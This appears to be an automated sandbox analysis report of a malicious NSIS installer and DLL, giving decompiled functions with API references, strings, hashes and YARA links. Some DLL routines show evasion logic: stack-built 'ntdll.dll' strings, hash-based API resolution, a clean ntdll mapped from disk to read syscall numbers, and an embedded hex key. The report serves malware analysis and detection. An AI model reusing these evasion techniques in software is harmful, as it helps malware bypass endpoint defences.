						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\alfons\AppData\Local\Temp\nscD29E.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\alfons\AppData\Local\Temp\nscD29E.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401786
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll$Call
API String ID: 1941528284-2288976729
Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 73CA22F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E73CA22F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E73CA12AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E73CA123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M73CA247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E73CA12FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E73CA12FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73CA1224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x73ca405c =  *0x73ca405c +  *0x73ca405c;
									__eax = GlobalAlloc(0x40,  *0x73ca405c +  *0x73ca405c); // executed
									__edi = __eax;
									 *0x73ca405c = MultiByteToWideChar(0, 0, __ebx,  *0x73ca405c, __edi,  *0x73ca405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E73CA12FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x73ca405c;
									__esi = __esi +  *0x73ca4064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73CA1429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73CA1224(0x73ca4034);
					goto L10;
				}
			}

0x73ca2306
0x73ca230a
0x73ca2315
0x73ca2315
0x73ca231c
0x73ca2321
0x00000000
0x00000000
0x73ca2325
0x73ca2328
0x00000000
0x00000000
0x73ca232d
0x73ca2338
0x73ca2348
0x73ca233f
0x73ca2341
0x73ca2357
0x73ca2357
0x00000000
0x73ca232f
0x73ca232f
0x73ca2358
0x73ca235c
0x73ca235e
0x73ca235e
0x73ca2361
0x73ca2361
0x73ca2369
0x73ca236c
0x73ca2373
0x73ca2377
0x73ca2446
0x73ca2447
0x73ca2452
0x73ca247d
0x73ca247d
0x73ca2462
0x73ca246e
0x73ca2464
0x73ca2464
0x73ca2464
0x00000000
0x73ca237d
0x73ca237d
0x00000000
0x73ca2384
0x00000000
0x00000000
0x73ca238d
0x00000000
0x00000000
0x73ca239b
0x73ca239e
0x00000000
0x00000000
0x73ca23a7
0x73ca23ac
0x73ca23af
0x73ca23b0
0x00000000
0x00000000
0x73ca23bd
0x73ca23c2
0x73ca23c8
0x73ca23d7
0x73ca23e2
0x73ca2405
0x73ca2408
0x73ca23e4
0x73ca23e8
0x73ca23ee
0x73ca23ef
0x73ca23f2
0x73ca23f3
0x73ca23f6
0x73ca23fd
0x73ca23fd
0x00000000
0x00000000
0x73ca2410
0x73ca2413
0x73ca241f
0x73ca2421
0x00000000
0x00000000
0x73ca2424
0x73ca2427
0x73ca2428
0x73ca242f
0x73ca2436
0x73ca2439
0x73ca243b
0x73ca243e
0x00000000
0x00000000
0x73ca237d
0x73ca2377
0x73ca234d
0x73ca2352
0x00000000
0x73ca2352

APIs

GlobalFree.KERNEL32 ref: 73CA2447

Part of subcall function 73CA1224: lstrcpynA.KERNEL32(00000000,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA1234

GlobalAlloc.KERNEL32(00000040,?), ref: 73CA23C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73CA23D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 73CA23E8
CLSIDFromString.OLE32(00000000,00000000), ref: 73CA23F6
GlobalFree.KERNEL32 ref: 73CA23FD

Strings

@u<u, xrefs: 73CA23F6

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID: @u<u
API String ID: 3730416702-3153514966
Opcode ID: e162be4fb63237a3e9fe8bfd458b2d71b1285eb2f4eaa1a047819c714fa2257c
Instruction ID: 34f13aab7d82489ecf4dfad58e8f68bf9889927470b882e5daa59f4ccaa906f8
Opcode Fuzzy Hash: e162be4fb63237a3e9fe8bfd458b2d71b1285eb2f4eaa1a047819c714fa2257c
Instruction Fuzzy Hash: 4A41B17150936ADFE311DF698844B6AB7FCFB41311F12491AF58AEB180DB70E944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100036E7, Relevance: 10.7, APIs: 7, Instructions: 237
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E100036E7(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E10004564();
				_v64 = E1000460C(_v20, 0x8a111d91);
				_v68 = E1000460C(_v20, 0x170c1ca1);
				_v52 = E1000460C(_v20, 0xa5f15738);
				_v72 = E1000460C(_v20, 0x433a3842);
				_v56 = E1000460C(_v20, 0xd6eb2188);
				_v60 = E1000460C(_v20, 0x50a26af);
				_v80 = E1000460C(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E10004767(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E1000457C(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E1000457C(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E1000460C(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

0x100036ed
0x100036f1
0x100036f5
0x100036fb
0x100036fc
0x10003702
0x10003703
0x10003709
0x1000370a
0x10003710
0x10003711
0x10003717
0x10003718
0x1000371e
0x1000371f
0x10003725
0x10003726
0x1000372c
0x1000372d
0x10003733
0x10003734
0x1000373a
0x1000373e
0x10003742
0x10003746
0x1000374a
0x1000374a
0x1000374a
0x10003753
0x10003763
0x10003773
0x10003783
0x10003793
0x100037a3
0x100037b3
0x100037c3
0x100037c6
0x100037cd
0x100037ec
0x100037f3
0x00000000
0x00000000
0x10003802
0x10003805
0x10003809
0x1000381f
0x10003822
0x10003826
0x1000383c
0x1000383f
0x10003841
0x1000384b
0x10003857
0x1000385d
0x10003861
0x10003864
0x10003868
0x1000387d
0x10003880
0x10003884
0x10003897
0x1000389c
0x100038a9
0x100038a9
0x100038b0
0x100038b3
0x00000000
0x00000000
0x100038de
0x100038a5
0x100038a5
0x100038a6
0x100038a6
0x100038f0
0x100038f3
0x100038f7
0x100038fb
0x100038ff
0x10003904
0x10003904
0x10003907
0x1000390b
0x10003917
0x10003917
0x1000391a
0x1000391e
0x10003920
0x00000000
0x00000000
0x00000000
0x100038f9
0x00000000
0x10003886
0x00000000
0x10003843
0x00000000
0x10003828
0x00000000
0x1000380b
0x10003926
0x1000392a
0x10003930
0x10003935
0x10003935
0x1000393a
0x1000393a
0x10003940
0x10003943
0x10003953
0x1000395d
0x10003962
0x1000397c
0x10003981
0x10003991
0x10003991
0x10003992
0x10003983
0x10003989
0x10003989
0x10003964
0x1000396d
0x10003971
0x10003971
0x00000000
0x00000000
0x10003955
0x00000000
0x10003953
0x1000399b
0x100039a3
0x100039aa
0x100039b6
0x100039b6
0x100039bf
0x100039bf
0x00000000

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 100037E9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 100039B6

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction ID: a4a951dc323091a8e79af4ab7c12a05185e9bd1e1b86be37fe86f9a6bd5a3c6c
Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction Fuzzy Hash: 1CA11074D00209EFEF11CFE4D985BAEBBB5FF08351F20846AE900BA2A4D7B55A40DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405845
0x00405849
0x0040584c
0x00405852
0x00405856
0x0040585a
0x00405862
0x00405869
0x0040586f
0x00405876
0x0040587d
0x00405885
0x00405887
0x00000000
0x00405887
0x00405891
0x00405898
0x004058ae
0x00000000
0x00000000
0x00000000
0x004058b0
0x004058b4

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
GetLastError.KERNEL32 ref: 00405891
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
GetLastError.KERNEL32 ref: 004058B0

Strings

C:\Users\user\Desktop, xrefs: 0040583A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405860

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1521822154
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065ff
0x00406608
0x0040660a
0x0040660a
0x0040660e
0x00406620
0x0040661a
0x0040661a
0x0040661a
0x00406624
0x00406638
0x0040664c
0x00406653

APIs

GetSystemDirectoryA.KERNEL32 ref: 004065FF
wsprintfA.USER32 ref: 00406638
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040664C

Strings

UXTHEME, xrefs: 004065F1
\, xrefs: 00406610
%s%s.dll, xrefs: 00406632

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D

Uniqueness

Uniqueness Score: -1.00%

Function 100042A0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100042A0(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x65;
				_v55 = 0x35;
				_v54 = 0x63;
				_v53 = 0x34;
				_v52 = 0x33;
				_v51 = 0x62;
				_v50 = 0x32;
				_v49 = 0x32;
				_v48 = 0x64;
				_v47 = 0x62;
				_v46 = 0x39;
				_v45 = 0x65;
				_v44 = 0x34;
				_v43 = 0x37;
				_v42 = 0x66;
				_v41 = 0x32;
				_v40 = 0x39;
				_v39 = 0x39;
				_v38 = 0x65;
				_v37 = 0x32;
				_v36 = 0x30;
				_v35 = 0x65;
				_v34 = 0x33;
				_v33 = 0x37;
				_v32 = 0x66;
				_v31 = 0x34;
				_v30 = 0x33;
				_v29 = 0x66;
				_v28 = 0x64;
				_v27 = 0x31;
				_v26 = 0x32;
				_v25 = 0x62;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E10004564();
				_v60 = E1000460C(_v8, 0x34cf0bf);
				_v64 = E1000460C(_v8, 0x55e38b1f);
				_v68 = E1000460C(_v8, 0xd1775dc4);
				_v120 = E1000460C(_v8, 0xd6eb2188);
				_v96 = E1000460C(_v8, 0xa2eae210);
				_v124 = E1000460C(_v8, 0xcd8538b2);
				_v72 = E1000460C(_v8, 0x8a111d91);
				_v76 = E1000460C(_v8, 0x170c1ca1);
				_v80 = E1000460C(_v8, 0xa5f15738);
				_v88 = E1000460C(_v8, 0x433a3842);
				_v92 = E1000460C(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
